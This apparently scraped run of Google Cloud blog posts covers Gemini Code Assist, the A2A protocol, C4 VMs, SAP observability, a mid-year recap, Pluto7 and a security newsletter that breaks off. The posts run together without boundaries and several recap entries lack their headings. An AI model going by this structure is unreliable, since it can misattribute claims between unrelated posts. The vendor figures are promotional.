Imagine a code review process that doesn’t slow you down. Instead of a queue of pending pull requests, you have an intelligent assistant that provides a near-instant, comprehensive summary of every change. It flags potential bugs, suggests improvements based on best practices, and frees up your human reviewers to focus on the complex architectural decisions that truly require their expertise.
This isn’t a future-state prediction; it’s what’s possible today with Gemini Code Assist, integrated directly into your GitHub workflow at no charge. By embedding a powerful AI partner into every pull request, we’re transforming code reviews from a frustrating bottleneck into a fast and painless way to ensure high quality and consistent code, leading to higher code quality and happier developers.
The challenge: Why code reviews are a bottleneck
Code reviews are a non-negotiable part of building quality software, but they are often a major bottleneck in the development lifecycle. This friction slows down delivery velocity, leads to inconsistent code quality, and makes it difficult to enforce best practices. Research from DORA’s Impact of Generative AI in Software Development report advises that organizations, “Double-down on fast high-quality feedback, like code reviews and automated testing, using gen AI as appropriate.” DORA research has found that teams with shorter-code review times have 50% better software delivery performance.1 AI adoption has been shown to increase code review speed by an estimated 3.1% for every 25% increase in AI adoption, and improve reported code quality by 3.4%.2
aside_block
<ListValue: [StructValue([(‘title’, ‘$300 in free credit to try Google Cloud AI and ML’), (‘body’, <wagtail.rich_text.RichText object at 0x3eb0e2656490>), (‘btn_text’, ‘Start building for free’), (‘href’, ‘http://console.cloud.google.com/freetrial?redirectPath=/vertex-ai/’), (‘image’, None)])]>
The solution: An AI-powered partner in your PRs
Gemini Code Assist integrates into your GitHub workflow as an intelligent partner, conducting code reviews to solve these challenges. When a pull request is created, Gemini is automatically assigned as a reviewer and gets to work immediately. Here’s how it helps:
Near-instant PR Summaries: Provides a comprehensive summary of the changes to help human reviewers get up to speed almost instantly.
In-depth automated reviews: Identifies stylistic issues, deviations from best practices, and potential bugs, freeing human reviewers to focus on more critical issues.
Interactive assistance and learning: Allows anyone in the PR to have a conversation with the AI using /gemini commands to ask for alternative implementations or get a fresh review.
The power of Gemini 2.5: A leap in code review intelligence
With our recent general availability release, Gemini Code Assist has been upgraded to run on our latest model, Gemini 2.5. This isn’t just an incremental update—it’s a major leap forward in the quality, accuracy, and intelligence of AI-powered code reviews.
What does this mean for your daily pull requests?
Deeper insights: You’ll see more insightful suggestions that go beyond simple style fixes. Gemini 2.5 is better at understanding the logic and intent behind your code, helping to identify potential bugs and suggest more efficient implementations.
More actionable code suggestions: Through customer specific style guides and configurations, the AI-generated code is now more accurate and context-aware. You’ll find that suggestions are often so reliable that you can commit them with confidence after a quick review, speeding up your iteration cycles.
Improved relevancy We have significantly increased the relevancy and accuracy of suggestions. This means you can trust the feedback you receive and spend less time second-guessing the AI and more time moving your project forward.
These improvements are a direct result of our rigorous internal testing and deliver more comprehensive and actionable feedback to help developers be more productive.
Customer story: How Delivery Hero enhances code quality with Gemini Code Assist
Delivery Hero is the world’s leading local delivery platform, operating in around 70 countries. Strengthening the code review process is a key part of their commitment to delivering high-quality, reliable features for the customers, which prompted them to become an early adopter of the Gemini Code Assist GitHub app. The initial feedback from their developers was overwhelmingly positive, and the app’s recent upgrade to the Gemini 2.5 model brought an even more significant impact to the app development process, particularly on code quality. Their engineers found the AI-generated comments to be highly relevant and valuable, directly contributing to a higher standard of code. The latest developer experience survey after the adoption of the Gemini Code Assist GitHub app showed a clear rise in developer satisfaction with the quality and speed of code reviews—marking a positive turn for this important metric.
“By integrating the Gemini Code Assist GitHub app into our workflow, we are not just adopting a tool; we are fostering a more robust, efficient, and collaborative engineering culture. Our close partnership with Google as an early adopter, built on an agile and effective feedback loop, has been a key part of this success.” N. Mert Aydin, Principal Software Engineer, Delivery Hero
Get started
Try it today: Get started with Gemini Code Assist on the GitHub Marketplace.
Learn more: Dive deeper by reading the official documentation.
AI is evolving beyond single, task-specific agents into an interconnected ecosystem, where autonomous agents collaborate to solve complex problems, regardless of their underlying platform. To make this transition easier for developers, we are announcing a comprehensive suite of tools that will empower developers to build, deploy, evaluate, and sell Agent2Agent (A2A) agents with Google Cloud.
Today, we’re excited to announce the release version 0.3 of the A2A protocol, which brings a more stable interface to build against and is critical to accelerating enterprise adoption. This version introduces several key capabilities, including gRPC support, the ability to sign security cards, and extended client side support in the Python SDK, which provide more flexible use, better security and easier integration.
The A2A protocol is quickly gaining momentum, with support from a growing ecosystem of over 150 organizations that spans every major hyperscaler, leading technology providers, and multinational customers using Google Cloud. Businesses are already building powerful capabilities for their organizations. For example, Tyson Foods and Gordon Food Service are pioneering collaborative A2A systems to drive sales and reduce supply chain friction, creating a real-time channel for their agents to share product data and leads that enhance the food supply chain.
aside_block
<ListValue: [StructValue([(‘title’, ‘$300 in free credit to try Google Cloud AI and ML’), (‘body’, <wagtail.rich_text.RichText object at 0x3eb0e03e7430>), (‘btn_text’, ‘Start building for free’), (‘href’, ‘http://console.cloud.google.com/freetrial?redirectPath=/vertex-ai/’), (‘image’, None)])]>
Build: Native support for A2A in the Agent Development Kit (ADK)
We’re releasing native support for A2A in Agent Development Kit (ADK), a powerful open source agent framework released by Google. This makes it easy to build A2A agents if you are already using ADK and is built upon our previously-released A2A SDKs. For example, with a simple “Hello, World!” style code snippet, developers can now use ADK to:
Use an A2A agent with an Agent Card and use it as a sub-agent.
Expose an existing ADK agent to make it discoverable as an A2A agent.
Developers can start building collaborative agents with ADK today.
Deploy: Flexible deployment options with Agent Engine, Cloud Run, and GKE
Once agents are built, they need a robust and scalable home to exist within. We are providing three powerful deployment paths for customers to scale agents into production:
Deploy to Agent Engine: For a managed, agent-optimized environment, Agent Engine is the choice for many agent builders. We’re adding support for A2A to Agent Engine in the coming weeks so that you can easily deploy an agent written in any framework to Agent Engine and get a production ready, Google-scale, A2A agent.
Deploy to Cloud Run: For increased flexibility, you can containerize and deploy your A2A agents to Cloud Run, leveraging Google’s serverless infrastructure for massive scale and reliability. Follow the published guide.
Deploy to Google Kubernetes Engine (GKE): For maximum control, you can deploy agents to GKE, providing the full power of Kubernetes to manage A2A systems at scale.
With support for A2A arriving in the coming weeks, developers will be able to use the `agent-starter-pack` CLI tool to complete CI/CD setup in just one line: “` uvx agent-starter-pack create my-agent -a adk@gemini-fullstack “`
Integrate: Bring your A2A agents to users with Agentspace
Agents need safe and accessible environments to be useful. That’s why we built Agentspace, the destination where agents meet end users. In the coming weeks, partners will be able to make any A2A agent available in Agentspace, transforming it from a standalone tool into a valuable service that people can consume. This includes partner-built agents that are built on partner platforms, giving customers the flexibility to access these A2A agents in multiple locations.
More than just a hub, Agentspace provides the critical governance, safety, and control features needed for an enterprise-ready agent platform, ensuring that interactions are secure and reliable.
Evaluate and commercialize your A2A systems
Building and deploying agents is just the beginning. To create truly enterprise-grade systems, you need robust evaluation capabilities, which is why we’re extending the Vertex GenAI Evaluation Service to support A2A agent evaluations. See our hands-on guidance.
Discover and sell partner-built A2A agents in AI Agent Marketplace
Partners can now sell their A2A agents directly to customers in the AI Agent Marketplace. This will allow Google Cloud customers to discover and purchase agents published by ISVs, GSIs, and other technology providers. The AI Agent Marketplace provides an important path to market for partners looking to monetize their AI Agents.
We announced the A2A protocol in April to lead the industry toward interoperable agent systems, and in June, we advanced that commitment by contributing it to the Linux Foundation. The industry’s response continues to grow, reflecting a shared belief in vendor-neutral, community-driven standards. Many of Google Cloud’s partners have previously offered agents to joint customers, and they are now enabling these agents with A2A to help future-proof investments for customers.
Adobe: A leader in generative AI, Adobe is leveraging the A2A protocol to make its rapidly-growing number of distributed agents interoperable with agents in Google Cloud’s ecosystem. The A2A protocol enables Adobe agents to collaborate in the enterprise to create powerful new digital experiences, streamline workflows that optimize the content creation process, and automate multi-system processes and data integrations.
S&P Global Market Intelligence: S&P, a provider of information services and solutions to global markets, has adopted A2A as a protocol for inter-agent communication. This strategic alignment enhances interoperability, scalability, and future-readiness across the organization’s agent ecosystem.
ServiceNow: As a founding partner of A2A, ServiceNow empowers customers with its AI Agent Fabric, a multi-agent communication layer that connects ServiceNow, customer, and partner-built agents. This provides enterprises with the greater choice and flexibility needed to unlock the full potential of agentic AI, resulting in faster decisions, fewer handoffs, and more scalable solutions.
Twilio: Twilio is using A2A protocol for implementing Latency Aware Agent Selection. By extending the A2A protocol, individual agents now broadcast their latency, enabling the system to intelligently route tasks to the most responsive agent available and also adapt gracefully – for example, playing a filler prompt or adding typing sounds, if a high-latency agent is the only option.
Developers can review more about past releases in the release notes, learn about what’s coming in the future in our roadmap, and join the community to help evolve the protocol moving forward. The community has also released great tooling around A2A with the launch of A2A Inspector and Technology Compatibility Kit.
Get started
We’re excited to partner across the industry to build the future of artificial intelligence. Here’s how you can start:
We’re thrilled to announce a significant expansion of our C4 virtual machine series, with the general availability of 28 powerful new shapes. This expansion introduces C4 shapes with Google’s next-gen Titanium Local SSD, C4 bare metal instances, and new extra-large shapes, all powered by the latest Intel Xeon 6 processors, Granite Rapids. We’re excited to be the first leading hyperscaler to bring Xeon 6 to customers.
C4 VMs with Xeon 6 deliver performance gains of up to 30% for general compute and up to 60% for ML recommendation workloads, and up to 35% lower access latency on Titanium Local SSD shapes. If you already use the C4 machine series, this means an easy and powerful path to the latest hardware without needing to migrate to a new machine series. You can take advantage of your existing committed use discounts (CUDs) and enjoy capabilities like managed instance groups and Google Kubernetes Engine (GKE) custom compute classes.
aside_block
<ListValue: [StructValue([(‘title’, ‘$300 in free credit to try Google Cloud infrastructure’), (‘body’, <wagtail.rich_text.RichText object at 0x3eb0df06a490>), (‘btn_text’, ‘Start building for free’), (‘href’, ‘http://console.cloud.google.com/freetrial?redirectPath=/compute’), (‘image’, None)])]>
C4 VMs on Intel Xeon 6
Initially launched with Intel 5th generation Xeon processors (Emerald Rapids), C4 VMs provided advancements in performance and control for enterprise and mission-critical workloads, especially AI, gaming, databases, and data analytics. And now with Xeon 6 (Granite Rapids), C4 VMs power even more demanding workloads, delivering the highest frequency of any Google Compute Engine VM — up to 4.2 GHz, the most vCPU and RAM of any Intel-based comparable product, larger L3 cache size, and 1.35x higher maximum memory bandwidth. The C4 machine series offers enhanced maintenance controls with a 30-day uptime window between planned maintenance events, and scalable Hyperdisk storage with up to 500k IOPS and 10 GB/s, including features like Hyperdisk Storage Pools.
Inference workloads on C4 with Xeon 6 demonstrate up to 60%better performance per core compared to prior-generation C3. C4’s new shapes support FP16-trained models with Intel AMX-FP16, making it a great choice for accelerating machine learning inference. Also, a new larger half- and full-host C4 shape (144 and 288 vCPU) guarantees memory isolation, for highly predictable performance. The largest C4 shape enables up to30% more performance per core on the estimated SPECrate®2017_int_base benchmark versus C3.
“SAS® Viya®, our cloud-based data and AI platform, is optimized for productivity with Intel hardware. We’re eager to scale production on C4 with Granite Rapids, having measured up to20% performance improvementin areas such asdeep learning and synthetic data generation. C4 with Granite Rapids leveraging Intel AMX delivers up to 6x speed-up, achieving GPU-comparable performance for a wide range ofgenerative AI use cases involving inference with small to mid-size models. This empowers customers to use SAS Viya in Google Cloud in a more cost-effective way.” – Craig Rubendall, Vice President, Applied Architecture and Technology, SAS
“As a next-generation visual effects studio, beloFX demandspeak performance for complex renders. When testing C4 on Granite Rapids, we observed an impressive 50% speedupagainst our n2d-standard-128 and n2-standard-128 nodes. This significant boost lets us produce more groundbreaking visual effects, faster, truly supercharging our ability to innovate.” – Christoph Ammann, Global Technology Supervisor, beloFX
New C4 standard, highmem, and highcpu with 144and 288vCPU shapes are powered exclusively by Xeon 6:
Machine Type
highcpu
standard
highmem
C4-highcpu-144
C4-standard-144
C4-highmem-144
C4-highcpu-288
C4-standard-288
C4-highmem-288
Turbocharge your storage with Titanium Local SSD
We’re also excited to announce Local SSD support for C4 VMs, available with new -lssd machine types, exclusively on Xeon 6 processors. These new local SSD shapes leverage the latest Titanium SSDs, delivering impressive I/O performance for workloads like high-performance databases (e.g., Cassandra, MongoDB, SQL Server tempDB and pagefile workloads), big data processing (e.g., Spark, Hadoop), media rendering and transcoding, and caching layers.
C4-lssd offers up to 7.2M max read IOPS, more than three times higher than comparable options from other leading hyperscalers. This translates to dramatic improvements in read/write latency. Titanium SSDs on C4 enable up to 35%lower access latency compared to previous generation SSDs.
“For financial market infrastructure, every microsecond of latency matters. With C4-LSSD, we have seen an impressive70% improvement in write latency compared to previous generations. This reduction with Titanium SSDs on C4 is crucial for our demanding, high-throughput applications, ensuring the stability and responsiveness essential for our business.”– Christian Hellmann, DevOps Engineer, Deutsche Börse Group
C4 with Local SSD is available in standard and highmem configurations starting from 4 vCPUs, exclusively on Xeon 6:
Machine Type
Local SSD Capacity (GiB)
standard
highmem
C4-standard-4-lssd
C4-standard-8-lssd
C4-standard-16-lssd
C4-standard-24-lssd
C4-standard-32-lssd
C4-standard-48-lssd
C4-standard-96-lssd
C4-standard-192-lssd
C4-standard-144-lssd
C4-standard-288-lssd
C4-highmem-4-lssd
C4-highmem-8-lssd
C4-highmem-16-lssd
C4-highmem-24-lssd
C4-highmem-32-lssd
C4-highmem-48-lssd
C4-highmem-96-lssd
C4-highmem-192-lssd
C4-highmem-144-lssd
C4-highmem-288-lssd
375
375
750
1,500
1,875
3,000
6,000
9,000
12,000
18,000
Unlock direct access with C4 bare metal shapes
For workloads that demand direct access to CPU and memory resources, we’re introducing C4 bare metal shapes. These instances are ideal for commercial and custom hypervisors, applications not traditionally supported in virtual machines, and those with special performance monitoring or licensing requirements. C4 bare metal is SAP-certified, delivering an impressive 132,600 aSAPs — the highest of any comparable machine, providing peak performance and compliance for your critical SAP application servers.
Customers in financial services, SaaS/PaaS security, with dev/test environments, and private cloud platforms will find C4 bare metal types essential for meeting their stringent performance goals. Compared to the previous generation C3 bare metal instances, C4 bare metal offers up to a 35% performance improvement.
New C4 bare metal instances are available in standard-metal and highmem-metal, powered exclusively by Xeon 6:
Machine Type
standard
highmem
C4-standard-288-metal
C4-highmem-288-metal
Get started with C4 on Intel Xeon 6 today
The expanded C4 machine series with Intel Xeon 6 is available today in 19 zones, with more expansion to come. Check the latest regional availability on our regions and zones page. Experience the leading performance, predictability, and control that C4 VMs deliver today! To learn more about C4 and its new capabilities, visit the C4 documentation.
“Intel and Google Cloud are shaping the future of cloud computing with the expansion of the C4 Machine Series powered by Intel Xeon 6 processors. With enhanced performance, built-in AI acceleration, and greater deployment flexibility with new and with extra-large shapes, we’re enabling customers to innovate faster and run workloads more efficiently than ever before.” – Ronak Singhal, Intel Senior Fellow, Intel
Managing complex SAP landscapes can feel like navigating a maze. You’re juggling application performance, database health, infrastructure stability, and more, all while striving to ensure seamless business applications. Today, we’re excited to announce new observability and monitoring functionality in Workload Manager to provide SAP customers with purpose-built tools that bridge gaps in data and provide a unified view of SAP environments across all layers of their cloud environments.
Workload Manager is not intended to replace your existing SAP monitoring tools, but rather complement them by providing a broader view of your SAP systems and enabling you to more easily correlate application-level insights with infrastructure performance and events.
Expanding visibility in complex SAP environments
Traditional SAP monitoring excels at providing detailed information at the application and database level. Metrics about transaction performance, user activity, and application logs are readily available. However, understanding the relationship between this application data and the underlying infrastructure can sometimes require additional effort. For example, a slowdown in transaction processing might be due to a database issue, a network bottleneck, or even a problem with the underlying virtual machine. While existing tools provide valuable insights, correlating application performance with infrastructure health can be a time-consuming process or may require toggling between different monitoring platforms and manual efforts.
aside_block
<ListValue: [StructValue([(‘title’, ‘Try Google Cloud for free’), (‘body’, <wagtail.rich_text.RichText object at 0x3eb0e270c9d0>), (‘btn_text’, ‘Get started for free’), (‘href’, ‘https://console.cloud.google.com/freetrial?redirectPath=/welcome’), (‘image’, None)])]>
Creating a system-centric, unified view with Workload Manager
After enabling the necessary functionality in Google Cloud’s Agent for SAP, you can navigate to the main Observability dashboard to see an overview of your SAP systems and the overall health status of each system and sub-layer. The health status is calculated using a variety of metrics from SAP Netweaver instances, SAP HANA databases, pacemaker clusters, and the availability of the underlying infrastructure hosting them.
Clicking on a system will take you to the system Overview page, where you can visualize the components of the system and see the current health status for each instance included. The Health Insights table will summarize any health issues that are currently detected, and the Maintenance Events table displays any upcoming maintenance for supported machine types.
The “Applications” and “Databases” tabs behave similarly, and help you correlate key performance indicators from your SAP applications with metrics from your VMs, storage, network, and other Google Cloud services such as the following:
Availability: GCE Instance Availability, SAP NetWeaver and SAP HANA instance status, SAP NetWeaver and SAP HANA process status and Pacemaker Cluster nodes and resource status.
Performance: GCE Instance CPU and memory utilization, operating system processes by CPU and memory and information about swap I/O operations on the operating system.
Storage: SAP related file systems usage, disk space utilization and usage, disk throughput and disk IOPS.
Networking: Information about network traffic and network packages.
Netweaver: CPU and memory utilization by SAP NetWeaver process, response time by processes in the SAP NetWeaver instance, SAP NetWeaver sessions and RFC connections by type, SAP NetWeaver process utilization per work process type and information for each SAP NetWeaver process type for each respective queue in the system.
HANA: SAP HANA System Replication status, SAP HANA System Replication latency, memory usage in the SAP HANA Database by type, information about idle and running connections in the SAP HANA database and top schemas by record count in the SAP HANA database.
Backups: Information related to Backint backups including Backup/Recovery success rate, Backup/Recovery average MBps for all operations and historical data about both Backup/Recovery status and throughput.
New Event Annotations built specifically for SAP allow you to surface system events directly on monitoring dashboards to help empower you to quickly identify the root cause or see the impact of events on your system’s performance and health. These events are also now available outside of Workload Manager in Cloud Monitoring dashboards.
SAP Availability:
Pacemaker cluster:
Pacemaker cluster node status
Pacemaker cluster resource status
SAP HANA Database:
SAP HANA instance status
SAP HANA service status
SAP NetWeaver:
SAP NetWeaver instance status
SAP NetWeaver service status
SAP Operations:
SAP HANA System Replication status
SAP HANA Backup status
SAP HANA Data backups
SAP HANA Log backups
For example, in the following screenshot we can see how a SAP HANA database failover impacted the database availability and see the series of events as the Pacemaker cluster moved the database operations to the secondary node.
Other key features and benefits:
Comprehensive metrics: The solution collects a wide range of metrics from your SAP applications and Google Cloud infrastructure, but if you are looking for more, you can create your own custom queries and add the metrics to your custom dashboards inside Workload Manager Observability.
Customizable dashboards: Modify the dashboards to create alternative views to help visualize what matters most to your business and allow for faster identification of critical issues
Alerting and notifications: The dashboards are natively integrated with Cloud Monitoring and Alerting. You can set up alerts for specific metrics and receive notifications when thresholds are breached
Automated system discovery: The Agent for SAP automatically identifies and reconciles your SAP instances and resources when enabled, saving you valuable time and avoiding manual tagging or labeling
Getting started
Ready to experience the benefits of a single-pane-of-glass for SAP observability on Google Cloud? You can view detailed documentation and instructions on how to get started and the supported architectures here. The observability service in Workload Manager is available at no additional cost, but the underlying metrics and logs are subject to costs associated with Cloud Monitoring and Cloud Logging. You can view an estimated cost for the required features that must be enabled here.
If you would like assistance onboarding or would like a demo or more information, please contact your account representative or Google Cloud support and we will be in touch.
Looking ahead
We are committed to continuously improving SAP observability on Google Cloud and plan on adding new features and more correlation capabilities and insightful visualizations.
Six months into 2025, we’ve already published hundreds of posts here on the Google Cloud blog. We asked ourselves, why wait until the busy end of the year to review your favorites? With everything from new AI models, product launches, emerging cyber threats, company news, certifications and customer stories, here is a mid-year recap that will get you up to speed on the latest from Google Cloud and the rapidly emerging cloud and AI landscape.
25. How Google Does It: Making threat detection high-quality, scalable, and modern
Published January 7, 2025
Google and Alphabet run the largest Linux fleet in the world, with nearly every flavor of operating system available, and see a steady stream of malicious system and network activity. Learn how our threat detection and response team detects, analyzes, and responds to threats on a vast scale.
More and more organizations are turning to Cloud Run, Google Cloud’s serverless runtime, for its simplicity, flexibility, and scalability. And now, with the general availability of NVIDIA GPUs on the platform, developers can choose Cloud Run for applications that require powerful graphics processing, like machine learning models.
23. BigQuery emerges as autonomous data-to-AI platform
Published April 10, 2025
This is not your grandfather’s data warehouse. BigQuery is now an AI-native, multimodal, and agentic data-to-AI platform. The blog post provides an overview of the many new features and capabilities that went into this new designation, including new data preparation, data analysis, code generation and management and troubleshooting capabilities.
22. Announcing Gen AI Toolbox for Databases. Get started today
Published February 6, 2025
Tired of building custom plumbing to connect your AI apps to your databases? This article announces the public beta of the Gen AI Toolbox for Databases, an open-source server built with LangChain that provides a secure, scalable, and manageable way to connect your generative AI applications to your data.
21. Ghost in the router: China-nexus espionage actor UNC3886 targets Juniper Networks
Published March 11, 2025
After discovering in 2024 that threat actors deployed custom backdoors to Juniper Networks’ Junos OS routers, Mandiant worked with Juniper to investigate this activity and observed that the affected routers were running end-of-life hardware and software. Learn more about the threat and how to remediate it in your environment.
It’s a platform, it’s a system, it’s AI Hypercomputer, Google Cloud’s fully managed supercomputing system for running AI and HPC workloads. As discussed at Google Cloud Next 2025, AI Hypercomputer supports all the latest and greatest compute, networking and storage infrastructure, and its software layer helps AI practitioners and engineers move faster with open and popular ML frameworks. Finally, there’s a full suite of workload management and observability tools to help you manage the thing.
19. Ipsos research shows why cloud certification matters — get certified with Google Cloud
Published February 25, 2025
Google Cloud partnered with Ipsos, the global research firm, to study the impact of cloud certifications on career advancement and achievement. For example, 8 out of 10 survey respondents said earning a recognized certificate helped them land a job faster and 75% believe they secured a higher salary through their certification.
18. Connect globally with Cloud WAN for the AI Era
Published April 9, 2025
With 202 points of presence (PoPs), powered by over 2 million miles of fiber, 33 subsea cables, and backed by a 99.99% reliability SLA, Google’s backbone network is, how do we put it? Vast. And with Cloud WAN, enterprises can now use it for their own wide area network (WAN) architectures.
17. Expanding generative media for enterprise on Vertex AI
Published April 9, 2025
At Google Cloud Next 25, we announced powerful new creative controls for our generative media models on Vertex AI. Now you can edit video with in-painting and out-painting, use camera controls for dynamic shots, and even create custom voices for AI-powered narration with as little as 10 seconds of audio.
Threat actors continue to target edge devices globally, leveraging deep device knowledge and using both zero-day and now n-day flaws. This activity aligns with the broader strategy that the Google Threat Intelligence Group has observed among suspected China-nexus espionage groups, who invest significantly in exploits and custom malware for critical edge infrastructure.
15. Defending against UNC3944: Cybercrime hardening guidance from the frontlines
Published May 6, 2025
Who is UNC3944? A financially-motivated threat actor characterized by its persistent use of social engineering and brazen communications with victims. Mandiant provides guidance and strategies for hardening systems and defenses against the cybercrime group, offering practical steps to protect against their specific attack methods.
14. MCP Toolbox for Databases (formerly Gen AI Toolbox for Databases)
Published April 22, 2025
Ready to build AI agents that can actually use your data? This article announces that our MCP Toolbox for Databases now supports the Model Context Protocol (MCP), making it easier than ever to connect your generative AI agents to enterprise data. With new support for the Agent Development Kit (ADK) and LangGraph, you can build powerful, stateful agents with intuitive code and connect them to your databases securely.
13. Formula E’s AI equation: A new Driver Agent for the next era of racing
Published March 25, 2025
As motorsport has grown in popularity, the ability of fans from diverse backgrounds to enter the cockpit has not always kept up. Formula E sought to level the course for aspiring drivers by creating an AI-powered Driver Agent; connected to a Formula E simulator, the agent provides drivers and coaches with real-time feedback on technique and tactics, help them improve faster than a flying lap.
12. Google Agentspace enables the agent-driven enterprise
Published April 9, 2025
Do you want to search all your company’s information in a few clicks, or generate ideas with built-in agents that already know your company’s style? Google Agentspace now includes a no-code agent designer, a gallery for discovering agents, and two new expert agents for deep research and idea generation, all integrated directly into Chrome.
11. Announcing Veo 3, Imagen 4, and Lyria 2 on Vertex AI
Published May 20, 2025
The next generation of creating for enterprise is here. We expanded Vertex AI to include our most powerful generative AI media models: Imagen 4 for stunningly realistic images with crisp text, Veo 3 for breathtaking video with synchronized audio, and Lyria 2 for composing high-fidelity, original music.
In the security realm, large language models (LLMs) open a world of new possibilities, from sifting through complex telemetry to secure coding, vulnerability discovery, and streamlining operations. However, some of these same AI capabilities are also available to attackers, leading to understandable anxieties about the potential for AI to be misused for malicious purposes.
9. Ivanti Connect Secure VPN targeted in new zero-day exploitation
Published January 8, 2025
Ivanti kicked off the year by disclosing two new vulnerabilities impacting its Ivanti Connect Secure (ICS) VPN appliances. Mandiant identified UNC5221, a suspected China-nexus espionage actor that previously exploited two other Ivanti vulnerabilities as early as December 2023, as the threat actor targeting the new zero-days. Successfully exploiting one of the vulnerabilities could result in downstream compromise of a victim network.
Google Cloud shares a vision with Wiz to improve security by making it easier and faster for organizations of all types and sizes to protect themselves, end-to-end, across all major clouds, and this post announces Google’s agreement to acquire the cloud security startup.
7. Veo 3 available for everyone in preview on Vertex AI
Published June 26, 2025
You dream it, Veo creates it. This post announces Veo 3, our most powerful text-to-video model yet, is now open for everyone to try in public preview on Vertex AI. Create stunning, near-cinematic videos with synchronized sound, and join the next wave of creative storytelling, now available to Google Cloud customers and partners.
6. Vertex AI offers new ways to build and manage multi-agent systems
Published April 9, 2025
This article announces ways to build multi-agentic systems, an evolution of traditional AI agents. To get there, we launched a new suite of tools in Vertex AI to help developers build and deploy them, including an open-source Agent Development Kit (ADK) and a managed Agent Engine. We also introduce the Agent2Agent (A2A) protocol, a new open standard to allow agents built by different companies to communicate and collaborate.
Even though it’s been around for a long time, not all developers speak fluent SQL. English, on the other hand, is pretty well-known. In this technical deep dive for developers working with natural language processing and databases, get the insights and techniques you need to enhance the accuracy and performance of your text-to-SQL conversions.
4. Firebase Studio lets you build full-stack AI apps with Gemini
Published April 9, 2025
For over a decade, developers the world over have relied on Firebase’s backend cloud computing services and application development platforms to power their web applications. And with the new Firebase Studio, they can now use it to develop full-stack AI applications, integrating with the Gemini AI model.
3. Multiple Russia-aligned threat actors targeting Signal Messenger
Published February 19, 2025
As part of the ongoing Russian-Ukrainian conflict, Signal Messenger accounts are of great interest to Russia’s intelligence services for their potential to deliver sensitive government and military communications. Google Threat Intelligence Group has observed increasing efforts from several Russia state-aligned threat actors to compromise Signal Messenger accounts used by individuals of interest to Russia’s intelligence services.
2. New Google Cloud certification in generative AI
One of the top questions we hear is “how do I get ahead”? This isn’t just another certification in a sea of technical qualifications. The Generative AI Leader certification is specifically focused on generative AI, and designed for visionary professionals like you — the managers, administrators, strategic leaders and more who understand that AI’s impact stretches far beyond code.
1. 601 real-world gen AI use cases from the world’s leading organizations
Published April 9, 2025
Since Next 2024, we’ve been gathering examples of how our customers are putting generative AI to use everyday across their operations and offerings. We nearly doubled the number of entries for Next 2025, and clearly they’re still resonating, as this has been our most popular story of the year. What use cases are most exciting you? Pop over to our LinkedIn page and let us know.
Thank you for being a part of the Google Cloud blog community! We look forward to bringing you lots more blogs for you to devour in the second half of the year.
Agentspace provides an Agent Development Kit (ADK) for building specialized agents and an A2A (Agent-to-Agent) communication protocol for agent collaboration. These tools facilitate a shift from static workflows to dynamic, adaptive business systems.
Pluto7’s Planning in a Box Pi Agent is designed to complement and offer an intelligent AI layer for autonomous planning. It integrates with various enterprise systems like SAP, Oracle, and Salesforce, consolidating structured and unstructured data into a Master Ledger via Google Cloud’s Cortex Framework. This effectively creates a real-time digital twin and control tower, providing a unified view and synchronized decision-making across the supply chain.
Pi Agent functions as a real-time supply chain planning assistant, mirroring a ride-share system for inventory. It senses real-time signals, reallocates resources, and makes proactive decisions. Examples include agents for demand analysis (Ron), inventory optimization (Kassy), financial balancing (Alex), and defect flagging (Bob), all collaborating through the A2A protocol. This allows for significantly faster decision-making and a transition from reactive problem-solving to proactive planning.
aside_block
<ListValue: [StructValue([(‘title’, ‘Try Google Cloud for free’), (‘body’, <wagtail.rich_text.RichText object at 0x3e4fd047a430>), (‘btn_text’, ‘Get started for free’), (‘href’, ‘https://console.cloud.google.com/freetrial?redirectPath=/welcome’), (‘image’, None)])]>
Practical impact
A case study featuring a LatAm CPG manufacturer demonstrates the practical impact. By implementing Planning in a Box + Pi Agent (now powered by Google Agentspace), the manufacturer gained real-time inventory visibility, improved order fulfillment, and is on track to reduce excess inventory by 15% while cutting manual reporting by 70%. It also has natural language access to inventory data: “How much inventory do I have for Faucet at Location Warehouse?”
The combination of Agentspace + Planning in a Box – Pi Agent creates an agentic command center for enterprises, enabling autonomous workflows, seamless ERP (SAP,Oracle,Netsuite) integration, and deployment within the user’s Google Cloud tenant delivered in the form for a service-as-a-software. This setup offers rapid time to value, with initial use cases deployable in weeks.
Over years, Pluto7 has seen customers getting on the platform adoption journey see significant business outcomes, including a 10–20% improvement in forecast accuracy, up to a 50% reduction in inventory carrying costs, over 50% safety stock reduction, faster planning cycles, and a 10%+ increase in margin all of which is articulated in Pluto7’s 2:10 rule of revenue growth with planning error reduction.
Looking ahead
Agentic AI isn’t the future – it’s already here redefining supply chain planning and enabling Planners to become superheros. Businesses can explore how Google Cloud’s Agentspace and Pluto7’s Planning in a Box can enable intelligent orchestration and real-time responsiveness in their supply chains.
Welcome to the second Cloud CISO Perspectives for July 2025. Today, Andy Wen, director, product management, Workspace Security, discusses new efforts we’re making to defend against identity-based cyberattacks.
As with all Cloud CISO Perspectives, the contents of this newsletter are posted to the Google Cloud blog. If you’re reading this on the website and you’d like to receive the email version, you can subscribe here.
aside_block
<ListValue: [StructValue([(‘title’, ‘Get vital board insights with Google Cloud’), (‘body’, <wagtail.rich_text.RichText object at 0x3e4f91e34160>), (‘btn_text’, ‘Visit the hub’), (‘href’, ‘https://cloud.google.com/solutions/security/board-of-directors?utm_source=cloud_sfdc&utm_medium=email&utm_campaign=FY24-Q2-global-PROD941-physicalevent-er-CEG_Boardroom_Summit&utm_content=-&utm_term=-‘), (‘image’, <GAEImage: GCAT-replacement-logo-A>)])]>
The evolving threat landscape: Beyond traditional 2FA
By Andy Wen, director, product management, Workspace Security
Andy Wen, director, product management, Workspace Security
Threat actors relentlessly pursue identity-based attacks, understanding that compromised credentials are a direct path to their objectives. To counter those attacks, we’re constantly innovating at Google, and we have some good news involving two critical innovations developed in close partnership with the wider security community.
Stolen credentials, email phishing, brute-force, and other identity-based vectors comprised 37% of successful breaches in 2024, in large part because of the rise of infostealers, a method threat actors rely on to scale identity attacks, according to Mandiant’s most recent M-Trends report. These initial breaches can frequently escalate into costly ransomware incidents and data exfiltration.
Google has long been a leader in security, and last year we announced that we are making two-factor authentication (2FA) mandatory for Google Cloud customers. We’re now taking security a step further and introducing new capabilities to keep customers secure.
In close collaboration with the Chrome team, we are adding a powerful addition to our security arsenal, now in beta: Device Bound Session Credentials (DBSC). DBSC are designed to disrupt cookie theft by creating an authenticated session that is cryptographically bound to a specific device.
How passkeys and Device Bound Session Credentials can help
